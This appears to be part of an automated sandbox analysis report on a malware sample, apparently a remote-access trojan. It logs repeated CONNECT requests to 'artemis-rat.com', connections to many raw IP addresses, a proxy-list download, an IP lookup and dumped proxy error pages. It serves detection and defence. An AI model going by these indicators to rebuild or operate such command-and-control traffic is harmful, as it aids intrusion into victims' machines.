                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 203.161.32.242
                Source: unknownTCP traffic detected without corresponding DNS query: 103.141.66.78
                Source: unknownTCP traffic detected without corresponding DNS query: 103.186.8.162
                Source: unknownTCP traffic detected without corresponding DNS query: 91.187.55.39
                Source: unknownTCP traffic detected without corresponding DNS query: 103.169.130.46
                Source: unknownTCP traffic detected without corresponding DNS query: 18.141.177.23
                Source: unknownTCP traffic detected without corresponding DNS query: 45.11.95.165
                Source: unknownTCP traffic detected without corresponding DNS query: 162.241.6.97
                Source: unknownTCP traffic detected without corresponding DNS query: 45.77.111.135
                Source: unknownTCP traffic detected without corresponding DNS query: 20.219.180.149
                Source: unknownTCP traffic detected without corresponding DNS query: 160.248.80.91
                Source: unknownTCP traffic detected without corresponding DNS query: 172.67.254.127
                Source: unknownTCP traffic detected without corresponding DNS query: 41.74.91.244
                Source: unknownTCP traffic detected without corresponding DNS query: 154.72.90.74
                Source: unknownTCP traffic detected without corresponding DNS query: 92.204.134.38
                Source: unknownTCP traffic detected without corresponding DNS query: 72.167.222.113
                Source: unknownTCP traffic detected without corresponding DNS query: 103.26.108.118
                Source: unknownTCP traffic detected without corresponding DNS query: 50.217.226.43
                Source: unknownTCP traffic detected without corresponding DNS query: 190.186.237.103
                Source: unknownTCP traffic detected without corresponding DNS query: 152.32.78.24
                Source: unknownTCP traffic detected without corresponding DNS query: 201.20.67.70
                Source: unknownTCP traffic detected without corresponding DNS query: 117.70.49.235
                Source: unknownTCP traffic detected without corresponding DNS query: 162.241.70.64
                Source: unknownTCP traffic detected without corresponding DNS query: 14.103.24.148
                Source: unknownTCP traffic detected without corresponding DNS query: 207.180.234.220
                Source: unknownTCP traffic detected without corresponding DNS query: 85.120.30.66
                Source: unknownTCP traffic detected without corresponding DNS query: 104.16.226.6
                Source: unknownTCP traffic detected without corresponding DNS query: 142.54.237.34
                Source: unknownTCP traffic detected without corresponding DNS query: 3.24.58.156
                Source: unknownTCP traffic detected without corresponding DNS query: 43.133.136.208
                Source: unknownTCP traffic detected without corresponding DNS query: 200.174.198.95
                Source: unknownTCP traffic detected without corresponding DNS query: 45.56.220.210
                Source: unknownTCP traffic detected without corresponding DNS query: 103.226.232.188
                Source: unknownTCP traffic detected without corresponding DNS query: 104.21.6.88
                Source: unknownTCP traffic detected without corresponding DNS query: 116.97.240.147
                Source: unknownTCP traffic detected without corresponding DNS query: 143.255.140.28
                Source: unknownTCP traffic detected without corresponding DNS query: 113.53.3.242
                Source: unknownTCP traffic detected without corresponding DNS query: 103.167.68.255
                Source: unknownTCP traffic detected without corresponding DNS query: 122.152.53.25
                Source: unknownTCP traffic detected without corresponding DNS query: 51.222.241.157
                Source: unknownTCP traffic detected without corresponding DNS query: 8.209.255.13
                Source: unknownTCP traffic detected without corresponding DNS query: 162.214.90.49
                Source: unknownTCP traffic detected without corresponding DNS query: 194.4.50.91
                Source: unknownTCP traffic detected without corresponding DNS query: 103.199.155.18
                Source: unknownTCP traffic detected without corresponding DNS query: 4.182.9.108
                Source: unknownTCP traffic detected without corresponding DNS query: 4.182.9.108
                Source: unknownTCP traffic detected without corresponding DNS query: 4.182.9.108
                Source: unknownTCP traffic detected without corresponding DNS query: 208.109.14.49
                Source: unknownTCP traffic detected without corresponding DNS query: 91.213.119.246
                Source: unknownTCP traffic detected without corresponding DNS query: 20.24.43.214
                Source: global trafficHTTP traffic detected: GET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: github.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:15 GMTContent-Type: text/html;charset=utf-8Content-Length: 3832X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 